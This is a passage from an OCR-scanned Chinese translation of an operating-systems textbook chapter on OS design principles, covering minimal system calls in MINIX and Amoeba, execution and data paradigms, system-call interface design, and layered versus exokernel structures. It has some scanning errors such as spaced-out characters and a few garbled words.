用 都 应 该 尽 自己 的 本 分 。 它 应 该 做 一 件 事情 并 且 把 它 做 好 。 当 设计 小 组 的 一 名 成 员 提议 扩充 一 个 系统 调 
用 或 者 添加 某 些 新 的 特性 时 ， 其 他 成 员 应 该 问 这 样 的 问题 ;“ 如 果 我 们 省 去 它 会 不 会 发 生 可 怕 的 事情 ?” 
如 果 回 答 是 :“ 不 会 ,但 是 有 人 可 能 会 在 某 一 天 发 现 这 一 特性 十 分 有 用 ”， 那 么 请 将 其 放 在 用 户 级 的 库 中 ， 
而 不 是 操作 系统 中 ,尽管 这 样 做 可 能 会 使 速度 慢 一 些 。 并 不 是 所 有 的 特性 都 要 比 高 速 飞行 的 子弹 还 要 快 。 
目标 是 保持 Corbat6 所 说 的 机 制 的 最 少 化 。 

让 读者 简略 地 看 一 看 我 亲身 经 历 的 两 个 例子 : MINIX (Tanenbaum 和 Woodhull，2006) 和 Amoeba 
(Tanenbaum 等 人 ，1990)。 实 际 上 ， 直 到 最 近 MINIX 只 有 三 个 系统 调用 : send、receive 和 sendrec。 系 
统 是 作为 一 组 进程 的 集合 而 构造 的 ， 内 存 管 理 、 文 件 系统 以 及 每 个 设备 驱动 程序 都 是 单独 的 可 调度 的 进 
程 。 大 致 上 说 ， 内 核 所 做 的 全 部 工作 只 是 调度 进程 以 及 处 理 在 进程 之 间 传 递 的 消息 。 因 此 ， 只 需要 两 个 
系统 调用 : send 发 送 一 条 消息 ， 而 receive 接 收 一 条 消息 。 第 三 个 调用 sendrec 只 是 为 了 效率 的 原因 而 做 
的 优化 ， 它 使 得 仅 用 一 次 内 核 陷 阱 就 可 以 发 送 一 条 消息 并 且 请 求 应 答 。 其 他 的 一 切 事情 都 是 通过 请 求 某 
些 其 他 进程 (例如 文件 系统 进程 或 磁盘 驱动 程序 ) 做 相应 的 工作 而 完成 的 。 最 新 版 本 的 MINIX 增 加 了 两 
个 调用 ， 都 是 用 来 进行 异步 通信 的 。senda 发 送 一 条 异步 消息 。 内 核 将 尝试 传递 这 条 消息 ， 但 是 应 用 不 
会 等 待 ， 而 是 继续 执行 。 类 似 的 ， 系 统 使 用 notify 调 用 来 传递 短 通知 。 例 如 ， 内 核 可 以 通知 一 个 用 户 空 
间 的 设备 驱动 某 些 事情 发 生 了 ， 这 很 像 一 个 中 断 。 没 有 消息 与 通知 相关 联 。 当 内 核 将 一 个 通知 传递 给 进 
程 时 ， 它 所 做 的 就 是 翻转 进程 位 图 表 中 的 一 位 来 表示 有 事情 发 生 了 。 因 为 这 个 过 程 很 简单 ， 所 以 速度 很 
k, 并且 内 核 不 用 担心 如 果 一 个 进程 收 到 两 次 相同 的 通知 时 要 传递 什么 消息 。 值 得 注意 的 是 ， 尽 管 调用 
的 数量 仍然 很 少 ， 但 是 却 在 增长 。 膨 胀 是 必然 的 ， 抵 抗 是 徒劳 的 。 

当然 ， 这 些 都 是 内 核 的 调用 。 在 此 之 上 运行 POSIX 兼 容 的 系统 ， 需 要 实现 大 量 的 POSIX 系 统 调 用 。 
但 是 它 的 美丽 之 处 在 于 这 些 调用 全 部 都 映射 到 了 一 个 很 小 的 内 核 调用 集合 上 。 有 了 这 样 一 个 〈 仍 然 ) 如 
此 简单 的 系统 ， 我 们 有 机 会 让 它 正确 运行 。 

Amoeba 甚 至 更 加 简单 。 它 仅 有 一 个 系统 调用 : 执行 远程 过 程 调用 。 该 调用 发 送 一 条 消息 并 且 等 待 
一 个 应 答 。 它 在 本 质 上 与 MINIX 的 sendrec 相 同 。 其 他 的 一 切 都 建立 在 这 一 调用 的 基础 上 。 关 于 同步 通 
信和 是否 是 一 个 好 的 方式 ， 我 们 将 在 12.3 节 继续 讨论 。 

原则 3: 效率 

第 三 个 指导 方针 是 实现 的 效率 。 如 果 一 个 功能 特性 或 者 系统 调用 不 能 够 有 效 地 实现 ， 或 许 就 不 值得 
包含 它 。 对 于 程序 员 来 说 ， 一 个 系统 调用 的 代价 有 多 大 应 该 是 直观 的 。 例 如 ，UNIX 程 序 员 会 认为 lseek 
系统 调用 比 read 系 统 调 用 要 代价 低廉 ， 因 为 前 者 只 是 在 内 存 中 修改 一 个 指针 ， 而 后 者 则 要 执行 磁盘 IO 。 
如 果 直 观 的 代价 是 错误 的 ， 程 序 员 就 会 写 出 效率 差 的 程序 。 


12.2.2 范 型 

一 旦 确定 了 目标 ， 就 可 以 开始 设计 了 。 一 个 良好 的 起 点 是 考虑 客户 将 怎样 审视 该 系统 。 最 为 重要 的 
问题 之 一 是 如 何 将 系统 的 所 有 功能 特性 良好 地 结合 在 一 起 ， 并 且 展 现 出 经 常 所 说 的 体系 结构 一 致 性 
(architectural coherence)。 在 这 方面 ， 重 要 的 是 区 分 两 种 类 型 的 操作 系统 “客户 ”。 一 方面 ， 是 用 户 , 他 
们 与 应 用 程序 打交道 ， 另 一 方面 ， 是 程序 员 ， 他 们 编写 应 用 程序 。 前 者 主要 涉及 GUI， 后 者 主要 涉及 系 
统 调用 接口 。 如 果 打算 拥有 遍及 整个 系统 的 单一 GUI， 就 像 在 Macintosh 中 那样 ， 设 计 应 该 在 此 处 开始 。 
然而 ， 如 果 打 算 支持 许多 可 能 的 GUI， 就 像 在 UNIX 中 那样 ， 那 么 就 应 该 首先 设计 系统 调用 接口 。 首 先 
设计 GUI 本 质 上 是 自 项 向 下 的 设计 。 这 时 的 问题 是 GUI 要 拥有 什么 功能 特性 ， 用 户 将 怎样 与 它 打交道 ， 
以 及 为 了 支持 它 应 该 怎样 设计 系统 。 例 如 ， 如 果 大 多 数 程序 在 屏幕 上 显示 图 标 然后 等 待 用 户 在 其 上 点 击 ， 
这 暗示 着 GUI 应 该 采用 事件 驱动 模型 ， 并 且 操 作 系统 或 许 也 应 该 采用 事件 驱动 模型 。 另 一 方面 ， 如 果 屏 
幕 主要 被 文本 窗口 占据 ， 那 么 进程 从 键盘 读 取 输 入 的 模型 可 能 会 更 好 。 

首先 设计 系统 调用 接口 是 自 底 向 上 的 设计 。 此 时 的 问题 是 程序 员 通 常 需要 哪些 种 类 的 功能 特性 。 实 
际 上 ， 并 不 是 需要 许多 特别 的 功能 特性 才能 支持 一 个 GUI。 例 如 ，UNIX 窗 口 系统 X 只 是 一 个 读 写 键盘 、 
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鼠标 和 屏幕 的 大 的 C 程 序 。X 是 在 UNIX 问 世 很久 以 后 才 开 发 的 ， 但 是 并 不 要 求 对 操作 系统 做 很 多 修改 就 
可 以 使 它 工作 。 这 一 经 历 验证 了 这 样 的 事实 : UNIX 是 十 分 完备 的 。 

1. 用 户 界面 范 型 

对 于 GUI 级 的 接口 和 系统 调用 接口 而 言 ， 最 重要 的 方面 是 有 一 个 良好 的 范 型 (有 时 称 为 隐喻 ) ， 以 
提供 观察 接口 的 方法 。 台 式 计算 机 的 许多 GUI 使 用 我 们 在 第 5 章 讨论 过 的 WIMP 范 型 。 该 范 型 在 遍及 接口 
的 各 处 使 用 定点 -点 击 、 定 点 -双击 、 拖 动 以 及 其 他 术语 ， 以 提供 总 体 上 的 体系 结构 一 致 性 。 对 于 应 用 
程序 常常 还 有 额外 的 要 求 ， 例 如 要 有 一 个 具有 文件 (FILE), H (EDIT) 以 及 其 他 条 目的 菜单 栏 ， 每 
个 条 目 具有 某 些 众 所 周知 的 菜单 项 。 这 样 ， 熟 悉 一 个 程序 的 用 户 就 能 够 很 快 地 学 会 另 一 个 程序 。 

然而 ，WIMP 用 户 界面 并 不 是 唯一 可 能 的 用 户 界面 。 平 板 电脑 、 智 能 手机 ， 以 及 一 些 笔记 本 使 用 触 
摸 屏 ， 用 户 可 以 更 加 直接 地 与 设备 交互 。 某 些 掌上 型 计算 机 使 用 一 种 程式 化 的 手写 界面 。 专 用 的 多 媒体 
设备 可 能 使 用 像 VCR 一 样 的 界面 。 当 然 ， 语 音 输入 具有 完全 不 同 的 范 型 。 重 要 的 不 是 选择 这 么 多 的 范 型 ， 
而 是 存在 一 个 单一 的 统领 一 切 的 范 型 统一 整个 用 户 界面 。 

不 管 选择 什么 范 型 ， 重 要 的 是 所 有 应 用 程序 都 要 使 用 它 。 因 此 ， 系 统 设 计 者 需要 提供 库 和 工具 包 给 
应 用 程序 开发 人 员 ， 使 他 们 能 够 访问 产生 一 致 的 外 观 与 感觉 的 程序 。 没 有 工具 ， 应 用 开发 者 做 出 来 的 东 
西 可 能 完全 不 同 。 用 户 界面 设计 很 重要 ， 但 它 并 不 是 本 书 的 主题 ， 所 以 我 们 现在 将 回 到 操作 系统 接口 的 
主题 上 。 

2. 执行 范 型 

体系 结构 一 致 性 不 但 在 用 户 层面 是 重要 的 ， 在 系统 调用 接口 层面 也 同样 重要 。 在 这 里 区 分 执行 范 型 
和 数据 范 型 常常 是 有 益 的 ， 所 以 我 们 将 讨论 两 者 ， 我 们 以 前 者 为 开始 。 

两 种 执行 范 型 被 广泛 接受 : 算法 范 型 和 事件 驱动 范 型 。 算 法 范 型 (algorithmic paradigm) 基于 这 样 
的 思想 : 启动 一 个 程序 是 为 了 执行 某 个 功能 ， 而 该 功能 是 事先 知道 的 或 者 是 从 其 参数 获知 的 。 该 功能 可 
能 是 编译 一 个 程序 、 编 制 工资 册 ， 或 者 是 将 一 架 飞 机 飞 到 旧金山 。 基 本 逻辑 被 硬 接线 到 代码 当中 ， 而 程 
序 则 时 常 发 出 系统 调用 获取 用 户 输入 、 获 得 操作 系统 服务 等 。 图 12-1a 中 概括 了 这 一 方法 。 


main() main( ) 


int... ; mess_t msg; 


init(); init( ); 
do_something( ); while (get_message(&msg)) { 
read(...); switch (msg.type) { 


do_something_else( ); case 1:...; 
write(...); case 2:...; 
keep_going(); case 3: ... ; 
exit(0); 





图 12-1 a) 算法 代码 ;，b) 事件 驱动 代码 


另 一 种 执行 范 型 是 图 12-1b 所 示 的 事件 驱动 范 型 (event-driven paradigm) 。 在 这 里 程序 执行 某 种 初 
始 化 (例如 通过 显示 某 个 屏幕 )， 然 后 等 待 操 作 系 统 告诉 它 第 一 个 事件 。 事 件 经 常 是 键盘 敲 击 或 鼠标 移 
动 。 这 一 设计 对 于 高 度 交 互 式 的 程序 是 十 分 有 益 的 。 

这 些 做 事情 的 每 一 种 方法 造就 了 其 特有 的 程序 设计 风格 。 在 算法 范 型 中 ， 算 法 位 居中 心 而 操作 系统 
被 看 作 服务 提供 者 。 在 事件 驱动 范 型 中 ， 操 作 系 统 同样 提供 服务 ， 但 是 这 一 角色 与 作为 用 户 行为 的 协调 
者 和 被 进程 处 理 的 事件 的 生产 者 相 比 就 没 那么 重要 了 。 

3. 数据 范 型 

执行 范 型 并 不 是 操作 系统 导出 的 唯一 范 型 ， 同 等 重要 的 范 型 是 数据 范 型 。 这 里 关键 的 问题 是 系统 结 
构 和 设备 如 何 展现 给 程序 员 。 在 早期 的 FORTRAN 批 处 理 系统 中 ， 所 有 一 切 都 是 作为 连续 的 磁带 来 建立 
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模型 。 用 于 读 入 的 卡片 组 被 看 作 输入 磁带 ， 用 于 穿孔 的 卡片 组 被 看 作 输 出 磁带 ， 并 且 打印 机 输出 被 看 作 
输出 磁带 。 磁 盘 文 件 也 被 看 作 磁带 。 对 一 个 文件 的 随机 访问 是 可 能 的 ， 只 要 将 磁带 倒 带 到 对 应 的 文件 并 
且 再 次 读 取 就 可 以 了 。 

使 用 作业 控制 卡片 可 以 这 样 来 实现 映射 : 

MOUNT(TAPE08, REEL781) 

RUN(INPUT, MYDATA, OUTPUT, PUNCH, TAPE08) 


第 一 张 卡片 指示 操作 员 去 从 磁带 架 上 取得 磁带 卷 781， 并 且 将 其 安装 在 磁带 驱动 器 8 上 。 第 二 张 卡片 指示 
操作 系统 运行 刚刚 编译 的 FORTRAN 程 序 ， 映 射 INPUT ( 意 指 卡片 阅读 机 ) 到 逻辑 磁带 1， 映 射 磁盘 文件 
MYDATA 到 逻辑 磁带 2， 映 射 打印 机 ( 称 为 OUTPUT) 到 逻辑 磁带 3， 映射 卡 片 穿孔 机 ( 称 为 PUNCH) 
到 逻辑 磁带 4， 并 且 映 射 物理 磁带 驱动 器 8 到 逻辑 磁带 5。 

FORTRAN 具 有 读 写 逻 辑 磁带 的 语法 。 通 过 读 逻 辑 磁 带 1， 程 序 获 得 卡片 输入 。 通 过 写 逻 辑 磁 带 3， 
输出 随后 将 会 出 现在 打印 机 上 。 通 过 读 罗 辑 磁 带 5， 磁 带 卷 781 将 被 读 入 ， 如 此 等 等 。 注 意 ， 磁 带 概 念 只 
是 集成 卡片 阅读 机 、 打 印 机 、 穿 也 机、 磁盘 文 件 以 及 磁带 的 一 个 范 型 。 在 这 个 例子 中 ， 只 有 逻辑 磁带 5 
是 一 个 物理 磁带 ， 其 余 的 都 是 普通 的 〈 假 脱 机 ) 磁盘 文件 。 这 只 是 一 个 原始 的 范 型 ， 但 它 却 是 正确 方向 
上 的 一 个 开端 。 

后 来 ，UNIX 问 世 了 ， 它 采用 “所 有 一 切 都 是 文件 ”的 模型 进一步 发 展 了 这 一 思想 。 使 用 这 一 范 型 ， 
所 有 IO 设备 都 被 看 作文 件 ， 并 且 可 以 像 普通 文件 一 样 打开 和 操作 。C 语 句 

fd1 = open("file1", O_RDWR); 

fd2 = open("/dev/tty", O_RDWR); 
打开 一 个 真正 的 磁盘 文件 和 用 户 终端 。 随 后 的 语句 可 以 使 用 fdl 和 fd2 分 别 读 写 它们 。 从 这 一 时 刻 起 ， 在 
访问 文件 和 访问 终端 之 间 并 不 存在 差异 ， 只 不 过 在 终端 上 寻 道 是 不 允许 的 。 

UNIX 不 但 统一 了 文件 和 IO 设备 ， 它 还 允许 像 访问 文件 一 样 通过 管道 访问 其 他 进程 。 此 外 ， 当 支持 
映射 文件 时 ， 一 个 进程 可 以 得 到 其 自身 的 虚拟 内 存 ， 就 像 它 是 一 个 文件 一 样 。 最 后 ， 在 支持 /proc 文 件 系 
统 的 UNIX 版 本 中 ，C 语 句 

fd3 = open("/proc/501", O_RDWR); 


允许 进程 (尝试) 访问 进程 501 的 内 存 ， 使 用 文件 描述 符 fd3 进 行 读 和 写 ， 这 在 某 种 程度 上 是 有 益 的 ， 例 
如 对 于 一 个 调试 器 。 

当然 ， 仅 仅 因为 某 些 人 说 “所 有 一 切 都 是 文件 ”并 不 意味 着 它 永远 是 对 的 。 比 如 ，UNIX 网 络 套 接 
字 有 点 像 文 件 ， 但 是 它 有 自己 的 与 众 不 同 的 API。 而 贝尔 实验 室 的 Plan 9 操作 系统 没有 妥协 ， 从 而 没有 为 
网 络 套 接 字 提 供 专门 的 接口 。 因 此 ，Plan 9 的 设计 可 以 说 更 加 整洁 。 

Windows 试 图 使 所 有 一 切 看 起 来 像 是 一 个 对 象 。 一 旦 一 个 进程 获得 了 一 个 指向 文件 、 进 程 、 信 号 量 、 
邮箱 或 者 其 他 内 核对 象 的 有 效 句 柄 ， 它 就 可 以 在 其 上 执行 操作 。 这 一 范 型 甚至 比 UNIX 更 加 一 般 化 ， 并 
且 比 FORTRAN 要 一 般 化 得 多 。 

统一 的 范 型 还 出 现在 其 他 上 下 文中 ， 其 中 在 这 里 值得 一 提 的 是 Web。Web 背 后 的 范 型 是 充满 了 文档 
的 超 空 间 ， 每 一 个 文档 具有 一 个 URL。 通 过 键入 一 个 URL 或 者 点 击 被 URL 所 支持 的 条 目 ， 你 就 可 以 得 到 
该 文档 。 实 际 上 ， 许 多 “文档 ”根本 就 不 是 文档 ， 而 是 当 请 求 到 来 时 由 程序 或 者 命令 行 解 释 器 脚本 生成 
的 。 例 如 ， 当 用 户 询问 一 家 网 上 商店 关于 一 位 特定 艺术 家 的 CD 清单 时 ， 文 档 由 一 个 程序 即时 生成 ， 在 
查询 未 做 出 之 前 该 文档 的 确 并 不 存在 。 

至 此 我 们 已 经 看 到 了 4 种 事例 ， 即 所 有 一 切 都 是 磁带 、 文 件 、 对 象 或 者 文档 。 在 所 有 这 4 种 事例 中 ， 
意图 是 统一 数据 、 设 备 和 其 他 资源 ， 从 而 使 它们 更 加 易于 处 理 。 每 一 个 操作 系统 都 应 该 具有 这 样 的 统一 
数据 范 型 。 

12.2.3 系统 调用 接口 

如 果 一 个 人 相信 Corbat6 的 机 制 最 少 化 的 格言 ， 那 么 操作 系统 应 该 提供 恰好 够 用 的 系统 调用 ， 并 且 每 

个 系统 调用 都 应 该 尽 可 能 简单 (但 不 能 过 于 简单 )。 统 一 的 数据 范 型 在 此 处 可 以 扮演 重要 的 角色 。 例 如 ， 
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如 果 文 件 、 进 程 、I/O 设 备 以 及 更 多 的 东西 都 可 以 看 作文 件 或 者 对 象 ， 那 么 它们 就 都 能 够 用 单一 的 read 系 
统 调用 来 读 取 。 否 则 ， 可 能 就 有 必要 具有 read_file、read_proc 以 及 read_tty 等 单独 的 系统 调用 。 

在 某 些 情况 下 ， 系 统 调用 可 能 需要 若干 变 体 ， 但 是 通常 比较 好 的 实现 是 具有 处 理 一 般 情况 的 一 个 系 
统 调用 ， 而 由 不 同 的 库 过 程 向 程序 员 隐 藏 这 一 事实 。 例 如 ，UNIX 具 有 一 个 系统 调用 exec， 用 来 覆盖 一 
个 进程 的 虚拟 地 址 空间 。 最 一 般 的 调用 是 : 

exec(name, argp, envp); 

该 调用 加 载 可 执行 文件 name， 并 且 给 它 提 供 由 argp 所 指向 的 参数 和 envp 所 指向 的 环境 变量 。 有 时 明 
确 地 列 出 参数 是 十 分 方便 的 ， 所 以 库 中 包含 如 下 调用 的 过 程 : 

execl(name, arg0, arg1, ..., argn, 0); 

execle(name, arg0, arg1, ..., argn, envp); 

所 有 这 些 过 程 所 做 的 事情 是 将 参数 粘连 在 一 个 数组 中 ， 然 后 调用 exec 来 做 具体 工作 。 这 一 安排 达到 了 双 
MAW: 单一 的 直接 系统 调用 使 操作 系统 保持 简单 ， 而 程序 员 得 到 了 以 各 种 方法 调用 exec 的 便利 。 

当然 ， 试 图 拥有 一 个 调用 来 处 理 每 一 种 可 能 的 情况 很 可 能 难以 控制 。 在 UNIX 中 ， 创 建 一 个 进程 需 
要 两 个 调用 : fork 然 后 是 exec， 前 者 不 需要 参数 ， 后 者 具有 3 个 参数 。 相 反 ， 创 建 一 个 进程 的 Win API 调 
用 CreateProcess 具 有 10 个 参数 ， 其 中 一 个 参数 是 指向 一 个 结构 的 指针 ， 该 结构 具有 另外 18 个 参数 。 

很 久 以 前 ， 有 人 曾经 问 过 这 样 的 问题 :“ 如 果 我 们 省 略 了 这 些 东 西 会 不 会 发 生 可 怕 的 事情 ?” 诚 实 
的 回答 应 该 是 :“ 在 某 些 情况 下 程序 员 可 能 不 得 不 做 更 多 的 工作 以 达到 特定 的 效果 ， 但 是 最 终 的 结果 将 
会 是 一 个 更 简单 、 更 小 巧 并 且 更 可 靠 的 操作 系统 。” 当 然 ， 主 张 10+18 个 参数 版 本 的 人 可 能 会 说 :“ 但 是 
用 户 喜欢 所 有 这 些 特性 。” 对 此 的 反 驱 可 能 会 是 :他 们 更 加 喜欢 使 用 很 少 内 存 并 且 从 来 不 会 崩溃 的 系统 。 
在 更 多 功能 性 和 更 多 内 存 代价 之 间 的 权衡 是 显而易见 的 ， 并 且 可 以 从 价格 上 来 衡量 (因为 内 存 的 价格 是 
已 知 的 ) 。 然 而 ， 每 年 由 于 某 些 特性 而 增加 的 崩溃 次 数 是 难于 估算 的 ， 并 且 如 果 用 户 知 道 了 隐藏 的 代价 
是 否 还 会 做 出 同样 的 选择 呢 ? 这 一 影响 可 以 在 Tanenbaum 软 件 第 一 定律 中 做 出 总 结 : 

添加 更 多 的 代码 就 是 添加 更 多 的 程序 错误 。 

添加 更 多 的 功能 特性 就 要 添加 更 多 的 代码 ， 因 此 就 要 添加 更 多 的 程序 错误 。 相 信 添 加 新 的 功能 特性 
而 不 会 添加 新 的 程序 错误 的 程序 员 要 么 是 计算 机 的 生 手 ， 要 么 就 是 相信 牙齿 仙女 (据说 会 在 儿童 掉 落 在 
枕 边 的 幼 齿 旁 放 上 钱财 的 仙女 ) 正在 那里 监视 着 他 们 。 

简单 不 是 设计 系统 调用 时 出 现 的 唯一 问题 。 一 个 重要 的 考虑 因素 是 Lampson (1984) 的 口号 : 

不 要 隐藏 能 力 。 

如 果 硬 件 具有 极其 高 效 的 方法 做 某 事 ， 它 就 应 该 以 简单 的 方法 展露 给 程序 员 ， 而 不 应 该 掩埋 在 某 些 
其 他 抽象 的 内 部 。 抽 象 的 目的 是 隐藏 不 合 需要 的 特性 ， 而 不 是 隐藏 值得 需要 的 特性 。 例 如 ， 假 设 硬件 具 
有 一 种 特殊 的 方法 以 很 高 的 速度 在 屏幕 上 (也 就 是 显存 ) 移动 大 型 位 图 ， 正 确 的 做 法 是 要 有 一 个 新 的 系 
统 调用 能 够 得 到 这 一 机 制 ， 而 不 是 只 提供 一 种 方法 将 显存 读 到 内 存 中 并 且 再 将 其 写 回 。 新 的 系统 调用 应 
该 只 是 移动 位 而 不 做 其 他 事情 。 如 果 系 统 调用 速度 很 快 ， 用 户 总 可 以 在 其 上 建立 起 更 加 方便 的 接口 。 如 
果 它 的 速度 慢 ， 没 有 人 会 使 用 它 。 

另 一 个 设计 问题 是 面向 连接 的 调用 与 无 连接 的 调用 。 读 文件 的 标准 UNIX 系 统 调 用 和 Windows 系 统 
调用 是 面向 连接 的 。 首 先 你 要 打开 一 个 文件 ， 然 后 读 它 ， 最 后 关闭 它 。 某 些 远 程 文件 访问 协议 也 是 面向 
连接 的 。 例 如 ， 要 使 用 FTP， 用 户 首先 要 登录 到 远程 计算 机 上 ， 读 文件 ， 然 后 注销 。 

另 一 方面 ， 某 些 远 程 文 件 访问 协议 是 无 连接 的 ， 例 如 Web 协 议 (HTTP)。 要 读 一 个 Web 页 面 你 只 要 
请 求 它 就 可 以 了 ， 不 存在 事先 建立 连接 的 需要 (TCP 连接 是 需要 的 ， 但 是 这 处 于 协议 的 低层 ，HTTP 协 
议 本 身 是 无 连接 的 )。 

任何 面向 连接 的 机 制 与 无 连接 的 机 制 之 间 的 权衡 在 于 建立 连接 的 机 制 ( 例 如 打开 文件 ) 要 求 的 额外 
开销 ， 以 及 在 后 续 调用 (可 能 很 多 ) 中 避免 进行 连接 所 带 来 的 好 处 。 对 于 单机 上 的 文件 IO 而 言 ， 由 于 
建立 连接 的 代价 很 低 ， 标 准 的 方法 (首先 打开 ， 然后 使 用 ) 可 能 是 最 好 的 方法 。 对 于 远程 文件 系统 而 言 ， 
两 种 方法 都 可 以 采用 。 

与 系统 调用 接口 有 关 的 另 一 个 问题 是 接口 的 可 见 性 。POSIX 强 制 的 系统 调用 列表 很 容易 找到 。 所 有 
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UNIX 系 统 都 支持 这 些 系统 调用 ， 以 及 少数 其 他 系统 调用 ， 但 是 完整 的 列表 总 是 公开 的 。 相 反 ， 
Microsoft 从 未 将 Windows 系 统 调用 列表 公开 。 作 为 替代 ，Win API 和 其 他 API 被 公开 了 ， 但 是 这 些 API 包 
含 大 量 的 库 调用 (超过 10 000 个 ) ， 只 有 很 少数 是 真正 的 系统 调用 。 将 所 有 系统 调用 公开 的 依据 是 可 以 
让 程序 员 知 道 什么 是 代价 低廉 的 (在 用 户 空间 执行 的 函数 )， 什 么 是 代价 昂贵 的 (内核 调 用 )。 不 将 它们 
公开 的 依据 是 这 样 给 实现 提供 了 灵活 性 ， 无 须 破坏 用 户 程序 就 可 以 修改 实际 的 底层 系统 调用 ， 以 便 使 其 
工作 得 更 好 。 就 像 9.7.7 节 说 过 的 那样 ， 最 初 的 设计 者 弄 错 了 access 系 统 调用 ， 而 现在 我 们 无 法 摆脱 这 个 
问题 。 


12.3 实现 


讨论 过 用 户 界 面 和 系统 调用 接口 后 ， 现 在 让 我 们 来 看 一 看 如 何 实现 一 个 操作 系统 。 在 下 面 8 个 小 节 ， 
我 们 将 分 析 涉 及 实现 策略 的 某 些 一 般 的 概念 性 问题 。 在 此 之 后 ， 我 们 将 看 一 看 某 些 低层 技术 ,这些 技术 
通常 是 十 分 有 益 的 。 


12.3.1 系统 结构 

实现 必须 要 做 出 的 第 一 个 决策 可 能 是 系统 结构 应 该 是 什么 。 我 们 在 1.7 节 分 析 了 主要 的 可 能 性 ， 在 
这 里 要 重 温 一 下 。 一 个 无 结构 的 单 块 式 设计 并 不 是 一 个 好 主意 ， 除 非 可 能 是 用 于 烤 面 包 片 机 中 的 微小 的 
操作 系统 ， 但 是 即使 在 这 里 也 是 可 争论 的 。 

1. 分 层 系统 

多 年 以 来 很 好 地 建立 起 来 的 一 个 合理 的 方案 是 分 层 系统 。Dijkstra 的 THE 系 统 (图 1-25) 是 第 一 个 
分 层 操作 系统 。UNIX 和 Windows HRAD EEK, 层次 


但 是 在 这 两 个 系统 中 分 层 更 是 一 种 试图 描述 系统 的 
方法 ， 而 不 是 用 于 建立 系统 的 真正 的 指导 原则 。 

对 于 一 个 新 系统 ,选择 走 这 一 路 线 的 设计 人 员 
应 该 首先 非常 仔细 地 选择 各 个 层次 ， 并 且 定义 每 个 
层次 的 功能 。 底 层 应 该 总 是 试图 隐藏 硬件 最 粳 粒 的 “4| be Tee] - | T Te 
特异 性 ， 就 像 图 11-4 中 HAL 所 做 的 那样 。 或 许 下 一 
层 应 该 处 理 中 断 、 上 下 文 切换 以 及 MMU， 从 而 在 这 
一 层 的 代码 大 部 分 是 与 机 器 无 关 的 。 在 这 一 层 之 上 ， 1 
不 同 的 设计 人 员 可 能 具有 不 同 的 口味 (与 偏好 )。 一 
种 可 能 性 是 让 第 3 层 管理 线程 ， 包 括 调度 和 线程 间 同 图 12-2 现代 层次 结构 操作 系统 的 一 种 设计 
步 ， 如 图 12-2 所 示 。 此 处 的 思想 是 从 第 4 层 开始 ， 我 们 拥有 适当 的 线程 ， 这 些 线程 可 以 被 
正常 地 调度 ， 并 且 使 用 标准 的 机 制 (例如 互 斥 量 ) 进行 同步 。 

在 第 4 层 ， 我 们 可 能 会 找到 设备 驱动 程序 ， 每 个 设备 驱动 程序 作为 一 个 单独 的 线程 而 运行 ， 具 有 自 
己 的 状态 、 程 序 计数 器 、 寄 存 器 等 ， 可 能 (但 是 不 必要 ) 处 于 内 核 地 址 空间 内 部 。 这 样 的 设计 可 以 大 大 
简化 LO 结构 ， 因 为 当 一 个 中 断 发 生 时 ， 它 就 可 以 转化 成 在 一 个 互 斥 量 上 的 unlock， 并 且 调 用 调度 器 以 
(潜在 地 ) 调度 重新 就 结 的 线程 ， 而 该 线程 曾 阻塞 在 该 互 尺 量 之 上 。MINIX3 使 用 了 这 一 方案 ,但 是 在 
UNIX、Linux 和 Windows 8 中 ， 中 断 处 理 程 序 运行 在 一 类 “无 主 地 带 ” 中 ， 而 不 是 作为 像 其 他 线程 一 样 
可 以 被 调度 和 挂 起 。 由 于 任何 操作 系统 的 大 量 复杂 性 都 在 IO 部分， 因此 任何 使 其 更 加 易于 处 理 和 封装 
的 技术 都 值得 考虑 。 

在 第 4 层 之 上 ， 我 们 预计 会 找到 虚拟 内 存 、 一 个 或 多 个 文件 系统 以 及 系统 调用 接口 。 这 些 层 的 目的 在 
于 为 应 用 提供 服务 如 果 虚 拟 内 存 处 于 比 文件 系统 更 低 的 层次 ， 那 么 数据 块 高 速 缓存 就 可 以 分 页 出 去 ， 使 
虚拟 内 存 管理 器 能 够 动态 地 决定 在 用 户 页 面 和 内 核 页 面 (包括 高 速 缓存 ) 之 间 应 该 怎样 划分 实际 内 存 。 
Windows 8 就 是 这 样 工作 的 。 

2. 外 内 核 

虽然 分 层 在 系统 设计 人 员 中 间 具 有 支持 者 ,但 是 还 有 另 一 个 阵营 恰恰 持 有 相反 的 观点 (Engler 等 人 ， 
1995 ) 。 他 们 的 观点 基于 端 到 端 问题 (end-to-end argument, Saltzer 等 人 ，1984)。 这 一 概念 是 说 ， 如 果 
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某 件 事情 必须 由 用 户 程序 本 身 去 完成 ， 在 一 个 较 低 的 层次 做 同样 的 事情 就 是 浪费 。 

考虑 将 该 原理 应 用 于 远程 文件 访问 。 如 果 一 个 系统 担心 数据 在 传送 中 被 破坏 ， 它 应 该 安排 每 个 文件 
在 写 的 时 候 计 算 校 验 和 ， 并 且 校 验 和 与 文件 一 同 存放 。 当 一 个 文件 通过 网 络 从 源 盘 传送 到 目标 进程 时 ， 
校 验 和 也 被 传送 ， 并 且 在 接收 端 重新 计算 。 如 果 两 者 不 一 致 ， 文 件 将 被 丢弃 并 且 重 新 传送 。 

校 验 比 使 用 可 靠 的 网 络 协议 更 加 精确 ， 因 为 除了 位 传送 错误 以 外 ， 它 还 可 以 捕获 磁盘 错误 、 内 存 错 
误 、 路 由 器 中 的 软件 错误 以 及 其 他 错误 。 端 到 端 问题 宣称 使 用 一 个 可 靠 的 网 络 协议 是 不 必要 的 ， 因 为 端 
点 (接收 进程 ) 拥有 足够 的 信息 以 验证 文件 本 身 的 正确 性 。 在 这 一 观点 中 ， 使 用 可 靠 的 网 络 协议 的 唯一 
原因 是 为 了 效率 ， 也 就 是 说 ， 更 早 地 捕获 与 修复 传输 错误 。 

端 到 端 问题 可 以 扩展 到 几乎 所 有 操作 系统 。 它 主张 不 要 让 操作 系统 做 用 户 程序 本 身 可 以 做 的 任何 事 
情 。 例 如 ， 为 什么 要 有 一 个 文件 系统 ? 只 要 让 用 户 以 一 种 受 保护 的 方式 读 和 写 原始 磁盘 的 一 个 部 分 就 可 
以 了 。 当 然 ， 大 多 数 用 户 喜 欢 使 用 文件 ， 但 是 端 到 端 问题 宣称 ， 文 件 系统 应 该 是 与 需要 使 用 文件 的 任何 
程序 相 链 接 的 库 过 程 。 这 一 方案 使 不 同 的 程序 可 以 拥有 不 同 的 文件 系统 。 这 一 论证 线索 表明 操作 系统 应 
该 做 的 全 部 事情 是 在 竞争 的 用 户 之 间 安 全 地 分 配 资源 (例如 CPU 和 磁盘 ) 。Exokernel 是 一 个 根据 端 到 端 
